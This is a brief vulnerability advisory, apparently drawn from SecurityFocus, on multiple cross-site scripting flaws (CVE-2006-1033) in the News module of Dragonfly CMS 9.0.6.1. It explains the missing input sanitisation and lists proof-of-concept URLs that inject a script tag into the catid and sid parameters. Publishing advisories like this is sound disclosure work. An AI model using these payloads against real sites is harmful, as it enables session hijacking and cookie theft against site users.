Dragonfly CMS 9.0.6 1 News Module - Multiple Cross-Site Scripting Vulnerabilities

Related Vulnerabilities: CVE-2006-1033  
Publish Date: 22 Feb 2006
Author: Lostmon
                source: http://www.securityfocus.com/bid/16784/info
 
Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
 
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/index.php?name=News&catid=1"><script>alert()</script>
http://www.example.com/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://www.example.com/index.php?name=News&file=submit
http://www.example.com/index.php?name=News&file=friend&sid=5"><script>alert()</script>